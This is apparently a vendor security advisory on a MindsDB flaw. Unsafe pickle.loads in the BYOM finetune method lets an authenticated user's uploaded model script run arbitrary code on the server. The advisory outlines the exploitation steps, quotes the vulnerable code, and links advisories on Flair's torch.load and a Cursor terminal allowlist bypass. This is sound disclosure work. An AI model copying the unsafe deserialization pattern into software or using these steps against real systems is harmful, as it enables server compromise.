Pickle Load on inhouse BYOM model finetune leads to arbitrary code execution
September 12, 2024

Products Impacted
This vulnerability is present in MindsDB versions v23.10.2.0 or newer.
CVSS Score: 7.1
AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data
Details
To exploit this vulnerability, an attacker authenticated to a MindsDB instance can create a Python script to train a model on a dataset and make predictions. Within the script, an attacker can include a class to create a malicious pickle object within the method used to train the model. The attacker can then use the ‘Upload Custom Model’ feature within the MindsDB UI to upload this Python script, along with the related requirements.txt file, which would need to contain any libraries required to successfully achieve the exploit. They can then upload the relevant dataset as a file and use the appropriate SQL query to train the model with it and the uploaded script.
When the model is trained, it is serialized along with the malicious pickle object due to the use of pickle.dumps within the train method of the ModelWrapperUnsafe class in the mindsdb/integrations/handlers/byom_handler/byom_handler.py file. The aforementioned class is used when the BYOM engine is changed to ‘inhouse’. A finetune query can subsequently run on the model. Upon the query being run, the code is passed to the vulnerable finetune method of the ModelWrapperUnsafe class in the mindsdb/integrations/handlers/byom_handler/byom_handler.py file, which calls pickle.loads on the model, as shown below:
def finetune(self, df, model_state, args):
self.model_instance.__dict__ = pickle.loads(model_state)
call_args = [df]
if args:
call_args.append(args)
self.model_instance.finetune(df, args)
return pickle.dumps(self.model_instance.__dict__, protocol=5)
This leads to the malicious pickle object being deserialized and any arbitrary code contained within it being executed on the server.
Related SAI Security Advisory
February 26, 2026
Flair Vulnerability Report
An arbitrary code execution vulnerability exists in the LanguageModel class due to unsafe deserialization in the load_language_model method. Specifically, the method invokes torch.load() with the weights_only parameter set to False, which causes PyTorch to rely on Python’s pickle module for object deserialization.
November 26, 2025
Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode
When in autorun mode, Cursor checks commands sent to run in the terminal to see if a command has been specifically allowed. The function that checks the command has a bypass to its logic allowing an attacker to craft a command that will execute non-allowed commands.